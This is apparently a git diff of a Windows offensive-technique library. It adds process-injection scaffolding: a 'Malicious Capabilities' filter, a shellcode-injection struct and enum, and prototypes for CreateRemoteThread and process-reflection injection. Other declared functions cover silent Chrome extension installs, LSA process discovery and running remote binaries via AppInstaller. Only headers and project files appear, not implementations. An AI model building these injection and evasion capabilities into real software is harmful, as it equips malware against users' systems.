INT ShlwapiCharStringToWCharString(_In_ PCHAR InString, _Inout_ PWCHAR OutString, _In_ INT BufferSize);
|
||||
INT ShlwapiWCharStringToCharString(_In_ PWCHAR InString, _Inout_ PCHAR OutString, _In_ INT BufferSize);
|
||||
ULONG ConvertCharacterStringToIntegerUsingNtdllA(_In_ PCHAR InString);
|
||||
ULONG ConvertCharacterStringToIntegerUsingNtdllW(_In_ PWCHAR InString);
|
||||
ULONG ConvertCharacterStringToIntegerUsingNtdllW(_In_ PWCHAR InString);
|
||||
PVOID MemoryFindMemory(_In_ PVOID Haystack, _In_ SIZE_T HaystackLength, _In_ PVOID Needle, _In_ SIZE_T NeedleLength);
|
|
@ -235,6 +235,7 @@
|
|||
<ClCompile Include="IsProcessRunningAsAdmin.cpp" />
|
||||
<ClCompile Include="IsRegistryKeyValid.cpp" />
|
||||
<ClCompile Include="LdrLoadGetProcedureAddress.cpp" />
|
||||
<ClCompile Include="MemoryFindMemory.cpp" />
|
||||
<ClCompile Include="MpfLolExecuteRemoteBinaryByAppInstaller.cpp" />
|
||||
<ClCompile Include="Main.cpp" />
|
||||
<ClCompile Include="ManualResourceDataFetching.cpp" />
|
||||
|
@ -246,6 +247,8 @@
|
|||
<ClCompile Include="MpfGetLsaPidFromNamedPipe.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromRegistry.cpp" />
|
||||
<ClCompile Include="MpfGetLsaPidFromServiceManager.cpp" />
|
||||
<ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp" />
|
||||
<ClCompile Include="ProcessInjectionMain.cpp" />
|
||||
<ClCompile Include="ProxyRegisterWaitLoadLibrary.cpp" />
|
||||
<ClCompile Include="ProxyWorkItemLoadLibrary.cpp" />
|
||||
<ClCompile Include="RemoveDescriptorEntry.cpp" />
|
||||
|
|
|
@ -67,6 +67,9 @@
|
|||
<Filter Include="Source Files\Rad Hardware Breakpoint Hooking Engine\Demonstration">
|
||||
<UniqueIdentifier>{5d653d78-df9a-400d-a3bd-3961bf4e09e4}</UniqueIdentifier>
|
||||
</Filter>
|
||||
<Filter Include="Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection">
|
||||
<UniqueIdentifier>{afb1a792-4365-4fb2-ae74-b93768c98289}</UniqueIdentifier>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Main.cpp">
|
||||
|
@ -537,6 +540,15 @@
|
|||
<ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MpfProcessInjectionViaProcessReflection.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="ProcessInjectionMain.cpp">
|
||||
<Filter>Source Files\Windows API Helper Functions\Malicious Capabilities\Process Injection</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="MemoryFindMemory.cpp">
|
||||
<Filter>Source Files\String Manipulation</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="Internal.h">
|
||||
|
|
|
@ -39,20 +39,25 @@
|
|||
#define InlineGetCurrentProcess (HANDLE)((HANDLE)-1)
|
||||
|
||||
|
||||
/*******************************************
|
||||
SHELLCODE VIA CALLBACK ROUTINE INFORMATION
|
||||
*******************************************/
|
||||
|
||||
/*
|
||||
|
||||
LPBYTE Payload is a pointer to shellcode
|
||||
DWORD dwLengthOfPayloadInBytes is the length of the payload in bytes
|
||||
LPBYTE Payload
|
||||
a pointer to shellcode
|
||||
DWORD dwLengthOfPayloadInBytes
|
||||
the length of the payload in bytes
|
||||
Enum SHELLCODE_EXECUTION_METHOD
|
||||
specifies shellcode execution method
|
||||
|
||||
|
||||
example:
|
||||
|
||||
SHELLCODE_EXECUTION_INFORMATION Sei = { 0 };
|
||||
Sei.Payload = Shellcode;
|
||||
Sei.dwLengthOfPayloadInBytes = 280 //whatever the length is
|
||||
|
||||
MethodEnum flag must be one of the values in the SHELLCODE_EXECUTION_METHOD enum
|
||||
each enum indicates which win32 function to use for shellcode execution
|
||||
|
||||
Sei.Payload = Shellcode; //pointer to shellcode
|
||||
Sei.dwLengthOfPayloadInBytes = 280; //whatever the length is
|
||||
Sei.Method = E_CERTENUMSYSTEMSTORE; //method from SHELLCODE_EXECUTION_METHOD
|
||||
*/
|
||||
|
||||
typedef enum SHELLCODE_EXECUTION_METHOD {
|
||||
|
@ -124,6 +129,52 @@ inline CRITICAL_SECTION CriticalSection = { 0 };
|
|||
inline DESCRIPTOR_ENTRY* Head = NULL;
|
||||
inline HARDWARE_ENGINE_INIT_SETTINGS_GLOBAL GlobalHardwareBreakpointObject;
|
||||
|
||||
/*******************************************
|
||||
PROCESS INJECTION INFORMATION
|
||||
*******************************************/
|
||||
|
||||
/*
|
||||
|
||||
LPBYTE Payload
|
||||
a pointer to shellcode
|
||||
DWORD dwLengthOfPayloadInBytes
|
||||
the length of the payload in bytes
|
||||
Enum PROCESS_INJECTION_METHOD
|
||||
specifies process injection method
|
||||
DWORD TargetPid
|
||||
specify target process
|
||||
[OPTIONAL] DWORD ThreadId
|
||||
specify target process thread id (depends PROCESS_INJECTION_METHOD)
|
||||
[OPTIONAL] TCHAR PathToFile //depends on if youre using W or A suffix
|
||||
path to DLL to load (depends PROCESS_INJECTION_METHOD)
|
||||
|
||||
|
||||
example:
|
||||
PROCESS_INJECTION_INFORMATION Pii = { 0 };
|
||||
Sei.Payload = Shellcode; //pointer to shellcode
|
||||
Pii.dwLengthOfPayloadInBytes = 280; //whatever the length is
|
||||
Pii.Method = E_PROCESSREFLECTION; //method from PROCESS_INJECTION_METHOD
|
||||
Pii.ProcessId = 100; //whatever the process id is, this is just a random number lol
|
||||
Pii.ThreadId = 0; //not required for this method
|
||||
Pii.PathToFile = DllPath; pointer to path of dll you want loaded, only WCHAR supported
|
||||
|
||||
*/
|
||||
|
||||
typedef enum PROCESS_INJECTION_METHOD {
|
||||
E_WRITEPROCESSMEMORY_CREATEREMOTETHREAD_EXECUTESHELLCODE, //0
|
||||
E_PROCESS_REFLECTION_EXECUTESHELLCODE, //1 UNIMPLEMENTED
|
||||
E_CTRL_INJECT //2
|
||||
}PROCESS_INJECTION_METHOD, * PPROCESS_INJECTION_METHOD;
|
||||
|
||||
typedef struct __PROCESS_INJECTION_INFORMATION {
|
||||
LPBYTE Payload;
|
||||
DWORD dwLengthOfPayloadInBytes;
|
||||
DWORD MethodEnum;
|
||||
DWORD ProcessId;
|
||||
DWORD ThreadId;
|
||||
PWCHAR PathToFile;
|
||||
}PROCESS_INJECTION_INFORMATION, *PPROCESS_INJECTION_INFORMATION;
|
||||
|
||||
|
||||
|
||||
/*******************************************
|
||||
|
@ -309,6 +360,9 @@ BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginW(_In_ PWCHAR Extens
|
|||
BOOL __unstable__preview__MpfSilentInstallGoogleChromePluginA(_In_ PCHAR ExtensionIdentifier);
|
||||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerW(_In_ PWCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
BOOL MpfLolExecuteRemoteBinaryByAppInstallerA(_In_ PCHAR RemoteUrlTextFile, _In_ DWORD RemoteUrlLengthInBytes);
|
||||
DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii);
|
||||
BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
|
||||
BOOL MpfProcessInjectionViaCreateRemoteThread(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid);
|
||||
|
||||
|
||||
|
||||
|
|
Loading…
Reference in New Issue